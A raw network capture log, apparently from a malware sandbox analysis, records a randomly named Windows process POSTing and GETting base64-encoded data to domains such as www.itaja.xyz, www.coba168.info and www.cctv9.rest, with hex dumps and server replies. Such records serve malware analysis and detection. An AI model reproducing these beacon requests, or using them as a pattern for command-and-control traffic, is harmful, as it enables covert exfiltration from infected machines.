64 54 41 62 6f 58 6d 5a 70 4f 59 76 64 41 56 51 3d Data Ascii: GX4dS=caE5hT0Y8iu5oJj6/lCco+HWtr3kKbCvVCoUWIB9+5M3vavRi7ON1OvZW2cA3T5Ygtb8sbl0ZkU+GOaGXZFiBQHuUz7iqs+OFGonHkKL3r2hTMQYm+8zh+SexbzwFMQmOOdzyPSA7u3wi4OLbKybZ0r3bCc3jYmpxxV0sQYs9R0G9sP3dBWkgCMgbCij6Or7RnZns0udTAboXmZpOYvdAVQ=
Sep 30, 2024 08:31:31.618649006 CEST	1047	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:31:31 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 33 36 63 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 cb 72 db 38 10 bc eb 2b 26 bc f8 22 92 b6 ac 24 b2 57 52 55 62 69 cb aa 72 62 97 cd 54 ca 47 08 1c 88 88 41 80 0b 80 a6 b4 b5 3f e4 f3 7e 82 7f 6c 07 84 e4 75 5e 27 0a c0 74 f7 4c cf 8c a6 6f 16 d7 17 c5 fd cd 12 2e 8b 4f 57 70 f3 e5 e3 d5 ea 02 92 34 cf bf 9e 5e e4 f9 a2 58 c4 87 71 76 7c 92 e7 cb cf 09 24 95 f7 cd 79 9e 77 5d 97 75 a7 99 b1 9b bc b8 cd 2b 5f ab 71 ee bc 95 dc 67 a5 2f 93 f9 60 1a ee 40 31 bd 99 25 c2 f6 17 c8 4a ba af d1 33 08 2c 29 fe d5 ca c7 59 72 61 b4 47 ed d3 62 d7 60 02 3c 9e 66 89 c7 ad ef 89 ff 00 5e 31 eb d0 cf 5a 2f d2 49 a0 ea 39 34 ab 71 96 58 b3 36 de bd c2 69 a3 71 a8 8d d4 25 6e e9 2b 8c 52 a6 7b 01 bd 16 e6 8c 57 98 06 41 6b d4 77 0c 69 ff f4 4b 50 63 d9 a6 66 bf 89 2e 56 c5 d5 72 3e 3e 1e c3 67 e3 e1 4f d3 ea 72 9a c7 cb c1 34 bf 5c 7e 58 50 f2 1f af 17 f7 f4 b9 3c 99 bf 0a a2 d3 a0 a8 10 2c 99 82 ce 63 09 a5 e1 6d 4d be 40 c7 1c 68 a2 13 81 0e 8c 06 5f 49 07 0e ed 23 da 6c 30 bd 09 5c b7 07 42 0d 85 35 ed e3 f3 [TRUNCATED] Data Ascii: 36cuTr8+&"$WRUbirbTGA?~lu^'tLo.OWp4^Xqv\|$yw]u+_qg/`@1%J3,)YraGb`<f^1Z/I94qX6iq%n+R{WAkwiKPcf.Vr>>gOr4\~XP<,cmM@h_I#l0\B5SbtACONT\|Zya{Xi"RPpFI.==R_eicX."`T1}cv7?7CKw\&lZ{~zptrG_G\|2cQ{0`&M-fn$"XY>\|]%o-M7I=,2+ABFD#K5Au4R\\ EDE'#2,HDh1;0^iQ!31uAz!&>Nz^Z),#"4\Akd4%"HcDZZSC?{@DjnPBUiv!aFkAR_F8Y7is}cME#WIRUdn0Fa4\|DH,TLCEW}Zmo&2Ep{g#?<To]HnP@0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	57396	83.229.19.82	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:33.555169106 CEST	10831	OUT	POST /piim/ HTTP/1.1 Host: www.itaja.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.itaja.xyz Referer: http://www.itaja.xyz/piim/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 63 61 45 35 68 54 30 59 38 69 75 35 6f 4a 6a 36 2f 6c 43 63 6f 2b 48 57 74 72 33 6b 4b 62 43 76 56 43 6f 55 57 49 42 39 2b 35 45 33 6f 73 37 52 6a 59 6d 4e 32 4f 76 5a 62 57 63 42 33 54 34 49 67 74 44 34 73 62 68 6b 5a 68 59 2b 48 73 53 47 63 49 46 69 57 67 48 75 4a 44 37 68 75 73 2b 68 46 47 34 64 48 6b 61 4c 33 72 32 68 54 4f 49 59 69 73 55 7a 79 75 53 5a 32 62 7a 38 53 63 52 50 4f 50 34 49 79 50 47 36 37 34 48 77 69 59 65 4c 49 4a 61 62 62 55 72 78 4c 53 63 2f 6a 5a 62 72 78 78 4a 34 73 52 63 56 39 57 38 47 2f 61 65 42 4e 6c 69 36 6a 42 6f 53 5a 69 54 46 38 75 7a 61 61 58 31 6d 6c 45 69 2f 4f 52 54 77 56 58 77 42 52 61 36 57 59 78 69 69 61 32 44 38 6e 69 41 68 73 43 51 43 78 63 39 57 6a 35 6e 73 4d 52 38 2b 53 72 47 33 6d 77 31 68 72 74 75 75 56 69 79 6a 65 30 47 39 4a 34 72 69 41 41 46 64 72 71 55 72 51 30 33 56 6e 72 46 32 68 2b 6d 4c 4b 69 74 57 7a 30 4f 51 71 43 58 61 55 54 78 32 59 7a 73 43 44 44 55 6a 50 53 58 2f 72 77 2b 72 6b 57 72 6c 43 45 42 54 53 2b 32 47 44 4b 72 53 [TRUNCATED] Data Ascii: GX4dS=caE5hT0Y8iu5oJj6/lCco+HWtr3kKbCvVCoUWIB9+5E3os7RjYmN2OvZbWcB3T4IgtD4sbhkZhY+HsSGcIFiWgHuJD7hus+hFG4dHkaL3r2hTOIYisUzyuSZ2bz8ScRPOP4IyPG674HwiYeLIJabbUrxLSc/jZbrxxJ4sRcV9W8G/aeBNli6jBoSZiTF8uzaaX1mlEi/ORTwVXwBRa6WYxiia2D8niAhsCQCxc9Wj5nsMR8+SrG3mw1hrtuuViyje0G9J4riAAFdrqUrQ03VnrF2h+mLKitWz0OQqCXaUTx2YzsCDDUjPSX/rw+rkWrlCEBTS+2GDKrScpeaIyhAeJPicUFjQeF2J5h+3IijYqXLMOgF42oBrsjer0D/T6ewM7JKMtT0TpqJ7ouqJ3OvBHE2Th13JM0TuTSV0FWjEmNR4s9dE82U3xuRSeN0y3mMV5uHr5YI9s2OT8AjJniC6EB6WO/7OiMyQ43J4LZnuntGQ/oxFbb4Uqjb5UDNGdkRiQLhlWt9GXEvm5fnVBWhP/BuAPz88jD/Q6ttruu3aJidlm+2Cf4vM4ppbhZvi6sZPqtUaQQSE5zTpOBhtiGGUiyqKtmJfvDYywg0fGMPLpRd5i4h/OqacGPhWvgl1r2Et+fFJb0lYB/rvTK1AYL2EQ+tKdzt95N9nv8Txv9KqSTq+x5V6vAh1Cec1ZE4FypqdLnrlvB7kFnt0ScX5v9EkyPX/301fnNKIuvwzB5725swEQ2+ZP3iNGJbqdykvpr/aFKMw7QTSCxxMnymjlM9znzB3tROX4oqJQ76noMuSWD2CT8Cy5KJvRyW+rhw4XHq3XObaM4KWpmDSbp6xiXjgKRWX6BhywN5lOoraYWqITWANyVK0HqPnXnjLAVuHlG9KVuAHC2sEAxTUpPet+uQzShUz74lu/ECQx2xRlDbOvqJWwfLM0UzO72Gk/naOAImRXBF8ms3ruXS1CUatGJv7ofKiUJpC3yfvqKey0zntTQI4L [TRUNCATED]
Sep 30, 2024 08:31:34.277046919 CEST	1048	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:31:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 33 36 64 0d 0a 1f 8b 08 00 00 00 00 00 04 03 75 54 cb 72 e3 36 10 bc f3 2b 66 79 f1 45 24 2d ad 14 3b 8e a4 aa 5d 4b 29 ab ca bb 76 d9 dc da f2 11 02 87 22 62 10 60 00 d0 14 53 f9 21 9f f3 09 fe b1 0c 08 c9 f1 3e 72 a2 00 4c 77 cf f4 cc 68 fe 6e 75 73 99 3f dc ae e1 2a ff 74 0d b7 5f 3e 5e 6f 2e 21 4e b2 ec eb fb cb 2c 5b e5 ab f0 30 4d 4f c7 59 b6 fe 1c 43 5c 39 d7 5c 64 59 d7 75 69 f7 3e d5 66 97 e5 77 59 e5 6a 39 cd ac 33 82 bb b4 70 45 bc 8c e6 fe 0e 24 53 bb 45 5c 9a e1 02 59 41 f7 35 3a 06 9e 25 c1 3f 5b f1 b4 88 2f b5 72 a8 5c 92 f7 0d c6 c0 c3 69 11 3b dc bb 81 f8 37 e0 15 33 16 dd a2 75 65 72 ee a9 06 0e c5 6a 5c c4 46 6f b5 b3 6f 70 4a 2b 1c 29 2d 54 81 7b fa 96 5a 4a dd bd 82 de 0a 73 c6 2b 4c bc a0 d1 f2 1b 86 64 78 fa 29 a8 31 6c 57 b3 ff 89 ce 37 f9 f5 7a 39 3d 9d c2 67 ed e0 77 dd aa 62 9e 85 cb 68 9e 5d ad 3f ac 28 f9 8f 37 ab 07 fa 5c 8d 97 6f 82 e8 14 e5 15 82 21 53 d0 3a 2c a0 d0 bc ad c9 17 e8 98 05 45 74 a5 a7 03 ad c0 55 c2 82 45 f3 84 26 8d e6 b7 9e eb ee 48 a8 20 37 ba 7d 7a [TRUNCATED] Data Ascii: 36duTr6+fyE$-;]K)v"b`S!>rLwhnus?t_>^o.!N,[0MOYC\9\dYui>fwYj93pE$SE\YA5:%?[/r\i;73uerj\FoopJ+)-T{ZJs+Ldx)1lW7z9=gwbh]?(7\o!S:,EtUE&H 7}zy&9x^A0h`[o#1+t^WjVKGJ8C?\|A(7V2[Fp,p;4deg/ g/l2Nl;KUi/h.I"Hqbe?Omu"XQ>.\|]%2\aCl:X6%O32`Yb6'jd]G`N}I$2(HD(0YAn>r pYCL>JZ)p"XDL9:j8KZ2 KJXo~=j@t\|5{xV}6n$^CGcFd+vTm=,8,,7~h"1_1m(%]-Z(QWQp^'TZq]h+@,a0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	57398	83.229.19.82	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:36.100374937 CEST	466	OUT	GET /piim/?GX4dS=RYsZikA+gzGvj7iZiTCDr+aQt7fmUZTyGCVkHuEfnLcd5+XBs56/1e6IekUyxiYXxJTamO9QBVR7KuXqJ7BSZgW6PH27nc20dnk3ICKQzrrMBcAKjPIq1No=&QHdD=Mr7PG HTTP/1.1 Host: www.itaja.xyz Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:31:36.708544016 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Mon, 30 Sep 2024 06:31:36 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Accept-Ranges: bytes Data Raw: 35 66 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 [TRUNCATED] Data Ascii: 5f6<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.itaja.xyz \| Powered by www.lws.fr \| ID: 3f7241c269384af9708525f3e7346d39</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error m [TRUNCATED]
Sep 30, 2024 08:31:36.708575010 CEST	454	IN	Data Raw: 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74 20 73 68 6f 72 74 20 Data Ascii: switch called - "smart error messages". That means, of course, - that short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is
Sep 30, 2024 08:31:36.711488008 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	57399	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:41.773062944 CEST	738	OUT	POST /nwnl/ HTTP/1.1 Host: www.coba168.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.coba168.info Referer: http://www.coba168.info/nwnl/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 57 63 43 2b 66 74 78 33 47 4a 6d 36 64 69 72 61 4f 6a 71 42 72 47 2f 72 52 63 73 65 59 63 2b 77 47 47 4f 41 65 30 6d 66 46 42 39 2f 5a 5a 52 50 6b 32 5a 73 37 4d 4e 59 56 35 36 4d 6e 54 59 75 54 76 51 38 63 4a 72 65 59 4b 58 72 6b 39 2b 37 49 4a 44 72 4d 4d 71 45 75 6e 70 70 6b 6b 57 6c 4e 42 30 6c 67 7a 4a 43 4d 4c 74 6e 54 69 58 39 2f 67 41 61 5a 4c 6c 33 6f 45 37 51 4b 37 6b 41 54 4e 58 52 33 68 67 69 2b 6e 45 58 43 70 50 48 77 2f 42 59 6f 4d 49 59 6b 42 6e 4a 52 5a 48 35 68 70 70 54 66 2f 67 2f 49 6d 41 31 76 4c 78 71 6c 61 58 57 42 35 2f 48 49 4a 57 4f 39 77 64 75 78 67 3d 3d Data Ascii: GX4dS=WcC+ftx3GJm6diraOjqBrG/rRcseYc+wGGOAe0mfFB9/ZZRPk2Zs7MNYV56MnTYuTvQ8cJreYKXrk9+7IJDrMMqEunppkkWlNB0lgzJCMLtnTiX9/gAaZLl3oE7QK7kATNXR3hgi+nEXCpPHw/BYoMIYkBnJRZH5hppTf/g/ImA1vLxqlaXWB5/HIJWO9wduxg==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	57400	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:44.312175035 CEST	758	OUT	POST /nwnl/ HTTP/1.1 Host: www.coba168.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.coba168.info Referer: http://www.coba168.info/nwnl/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 57 63 43 2b 66 74 78 33 47 4a 6d 36 65 43 62 61 4d 45 32 42 73 6d 2f 6b 64 38 73 65 52 38 2b 30 47 47 53 41 65 31 54 59 46 33 4e 2f 59 38 31 50 6c 33 5a 73 34 4d 4e 59 64 5a 36 4a 70 7a 59 6c 54 76 4e 42 63 4a 58 65 59 4b 54 72 6b 34 43 37 4a 34 44 6f 4e 63 71 4b 31 58 70 52 37 30 57 6c 4e 42 30 6c 67 7a 4e 34 4d 50 42 6e 54 53 48 39 2f 46 67 56 48 37 6c 30 72 45 37 51 4f 37 6b 45 54 4e 58 76 33 67 39 4a 2b 6c 73 58 43 6f 2f 48 77 71 74 58 68 4d 49 53 71 68 6e 66 41 36 71 73 6a 5a 4d 6e 64 35 67 51 50 47 34 47 6e 74 67 77 30 72 32 42 54 35 62 30 56 4f 66 36 77 7a 67 6e 71 6c 78 43 4c 36 53 55 56 48 6e 30 42 5a 4f 6b 6a 7a 73 75 51 54 51 3d Data Ascii: GX4dS=WcC+ftx3GJm6eCbaME2Bsm/kd8seR8+0GGSAe1TYF3N/Y81Pl3Zs4MNYdZ6JpzYlTvNBcJXeYKTrk4C7J4DoNcqK1XpR70WlNB0lgzN4MPBnTSH9/FgVH7l0rE7QO7kETNXv3g9J+lsXCo/HwqtXhMISqhnfA6qsjZMnd5gQPG4Gntgw0r2BT5b0VOf6wzgnqlxCL6SUVHn0BZOkjzsuQTQ=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	57401	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:46.861073971 CEST	10840	OUT	POST /nwnl/ HTTP/1.1 Host: www.coba168.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.coba168.info Referer: http://www.coba168.info/nwnl/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 10302 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 57 63 43 2b 66 74 78 33 47 4a 6d 36 65 43 62 61 4d 45 32 42 73 6d 2f 6b 64 38 73 65 52 38 2b 30 47 47 53 41 65 31 54 59 46 30 74 2f 59 50 4e 50 6c 55 42 73 33 73 4e 59 58 35 36 49 70 7a 59 30 54 76 46 4e 63 4a 62 6b 59 49 62 72 69 61 61 37 41 71 72 6f 45 63 71 4b 71 6e 70 71 6b 6b 57 4b 4e 41 45 68 67 77 6c 34 4d 50 42 6e 54 58 44 39 32 77 41 56 46 37 6c 33 6f 45 37 4d 4b 37 6c 6a 54 4a 43 55 33 67 35 2f 2b 55 4d 58 42 49 76 48 7a 59 31 58 67 73 49 63 6e 42 6d 63 41 36 6e 38 6a 5a 51 64 64 35 38 36 50 46 6b 47 69 71 64 4d 70 34 65 4b 4a 62 66 79 4f 50 72 41 77 53 41 41 6e 44 52 68 61 37 50 42 50 45 57 61 61 6f 54 34 30 42 38 49 4b 30 43 4f 63 71 54 68 7a 55 38 61 30 31 43 5a 32 52 78 2f 68 78 63 35 50 32 6f 4f 73 54 58 38 61 61 66 4c 55 61 54 6b 79 35 37 59 2b 6b 68 37 6d 67 44 32 65 31 38 64 36 71 70 4f 33 67 4a 44 38 77 2f 64 45 57 61 46 44 49 6b 37 71 59 45 62 44 7a 4d 6d 48 53 77 5a 50 58 6f 72 64 36 75 66 53 73 6b 75 35 2f 76 7a 55 4f 35 75 6a 73 50 75 6b 6f 76 38 36 66 4e 31 [TRUNCATED] Data Ascii: GX4dS=WcC+ftx3GJm6eCbaME2Bsm/kd8seR8+0GGSAe1TYF0t/YPNPlUBs3sNYX56IpzY0TvFNcJbkYIbriaa7AqroEcqKqnpqkkWKNAEhgwl4MPBnTXD92wAVF7l3oE7MK7ljTJCU3g5/+UMXBIvHzY1XgsIcnBmcA6n8jZQdd586PFkGiqdMp4eKJbfyOPrAwSAAnDRha7PBPEWaaoT40B8IK0COcqThzU8a01CZ2Rx/hxc5P2oOsTX8aafLUaTky57Y+kh7mgD2e18d6qpO3gJD8w/dEWaFDIk7qYEbDzMmHSwZPXord6ufSsku5/vzUO5ujsPukov86fN1V8A1naVt8v/WFGJg8YZJLeV4jum3rzlLd+SvqFYkql/whU634Gs0Mnjw2sWvCXMdqCHhKjsTOdEIVWOgz+oB16jakIhg/rsaD4fYYB1bmMXV6aTbL0h2NTMQpsbzw4xrMs4wF9aFm8DCHY+8A6uboUszIO+sBxJZJcllJ2Ddw+w9syLC/GfIqPqQEITlwMU1YPZ/LHAWVy2nviQcyEmRajIJK1T0rHsQ1jZ4XwmEQNWJsGo/nxdsJmME/RRlXLFDhb88lo176rf4qXvTr0yPa5RthKQESSIe/fenwCeEc0w6UpHCm3fwAQP+hkU9nMNf0NlWaahsUAHdThQTfMxTPn1wqCds33Imwd/gDhieZc6Cd1ayE3vspwHyCzjk9MVRjcsIUlmJl2w5M7S02FCiBZgVX87o4zzE9GBfYIShBbKXlkQQcvuJmIxPaGOy0NFIYX8kjRaqsEh2yFIrbtQX/s2GsVM7JJCbYo0p8Iv7uurou0sPXjxmPyDZHqQx+x5mhTE9A/opIDtre0Ynb40K+p+zd9H6gm/4d3EAX0xBj/bhGChMX+QNHtlt4ftTbO6BNajaynDfZURYLAdu3R1O7HvQcxm9BiLLDP0hPilC3uOBxSd3BWbMaweBkWa9x7DGlfwFA1ZCjSHwLDgdctf+sMXADxqPW4C+8h [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	57402	3.33.130.190	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:49.406636000 CEST	469	OUT	GET /nwnl/?GX4dS=beqecatXY4qIJjPXOia4kQmqT9sqBvOCFEuBM0i0Dlt4M9tlrl1tg88laI+FpgcKerQYOIncNJ3shYG/Ub3oJIvQtmlajUKZMxQvi2F/DOJ3YHvB9A08ObE=&QHdD=Mr7PG HTTP/1.1 Host: www.coba168.info Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Sep 30, 2024 08:31:52.799474001 CEST	392	IN	HTTP/1.1 200 OK Server: openresty Date: Mon, 30 Sep 2024 06:31:52 GMT Content-Type: text/html Content-Length: 252 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 47 58 34 64 53 3d 62 65 71 65 63 61 74 58 59 34 71 49 4a 6a 50 58 4f 69 61 34 6b 51 6d 71 54 39 73 71 42 76 4f 43 46 45 75 42 4d 30 69 30 44 6c 74 34 4d 39 74 6c 72 6c 31 74 67 38 38 6c 61 49 2b 46 70 67 63 4b 65 72 51 59 4f 49 6e 63 4e 4a 33 73 68 59 47 2f 55 62 33 6f 4a 49 76 51 74 6d 6c 61 6a 55 4b 5a 4d 78 51 76 69 32 46 2f 44 4f 4a 33 59 48 76 42 39 41 30 38 4f 62 45 3d 26 51 48 64 44 3d 4d 72 37 50 47 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?GX4dS=beqecatXY4qIJjPXOia4kQmqT9sqBvOCFEuBM0i0Dlt4M9tlrl1tg88laI+FpgcKerQYOIncNJ3shYG/Ub3oJIvQtmlajUKZMxQvi2F/DOJ3YHvB9A08ObE=&QHdD=Mr7PG"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	57403	114.134.188.182	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:31:57.872931004 CEST	732	OUT	POST /s7c9/ HTTP/1.1 Host: www.cctv9.rest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.cctv9.rest Referer: http://www.cctv9.rest/s7c9/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 202 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 4e 74 71 44 41 31 6d 38 30 43 4b 42 70 6d 38 59 36 2b 30 4d 47 58 6c 45 57 57 46 46 72 53 68 56 31 6a 7a 76 77 72 66 58 36 75 39 72 6a 6e 72 4d 39 44 31 53 66 5a 2f 66 71 2f 55 63 55 64 66 71 63 4d 4a 31 69 48 56 5a 66 4b 2f 2b 7a 7a 55 43 5a 54 65 54 42 52 77 79 4e 54 4a 42 6e 74 45 71 51 7a 71 7a 4c 56 44 32 34 52 39 72 76 54 36 6c 49 74 67 6a 32 43 53 49 53 52 38 55 30 63 44 46 37 4f 73 62 73 57 42 71 5a 50 78 4e 53 42 39 6e 70 54 55 38 43 37 6f 74 66 44 37 63 53 54 57 48 56 31 63 6b 4f 74 54 4c 30 41 75 7a 34 59 4e 71 7a 64 6d 4a 72 64 41 34 61 52 57 5a 58 51 59 57 2f 51 3d 3d Data Ascii: GX4dS=NtqDA1m80CKBpm8Y6+0MGXlEWWFFrShV1jzvwrfX6u9rjnrM9D1SfZ/fq/UcUdfqcMJ1iHVZfK/+zzUCZTeTBRwyNTJBntEqQzqzLVD24R9rvT6lItgj2CSISR8U0cDF7OsbsWBqZPxNSB9npTU8C7otfD7cSTWHV1ckOtTL0Auz4YNqzdmJrdA4aRWZXQYW/Q==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	57404	114.134.188.182	80	4248	C:\Program Files (x86)\jSyAJrgjZOVcydAJMtoGbEfCEicDMKgUlueMmMdlXUfi\jsmAYDUnVBUZ.exe

Timestamp	Bytes transferred	Direction	Data
Sep 30, 2024 08:32:00.411463976 CEST	752	OUT	POST /s7c9/ HTTP/1.1 Host: www.cctv9.rest Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Origin: http://www.cctv9.rest Referer: http://www.cctv9.rest/s7c9/ Content-Type: application/x-www-form-urlencoded Cache-Control: no-cache Connection: close Content-Length: 222 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Data Raw: 47 58 34 64 53 3d 4e 74 71 44 41 31 6d 38 30 43 4b 42 70 47 4d 59 70 4e 63 4d 52 6e 6c 48 64 32 46 46 69 79 68 52 31 6a 33 76 77 71 4c 48 36 64 4a 72 6a 43 58 4d 73 79 31 53 63 5a 2f 66 68 66 56 57 51 64 65 6b 63 4d 55 41 69 48 70 5a 66 4f 76 2b 7a 32 34 43 5a 6b 71 51 42 42 77 73 43 7a 4a 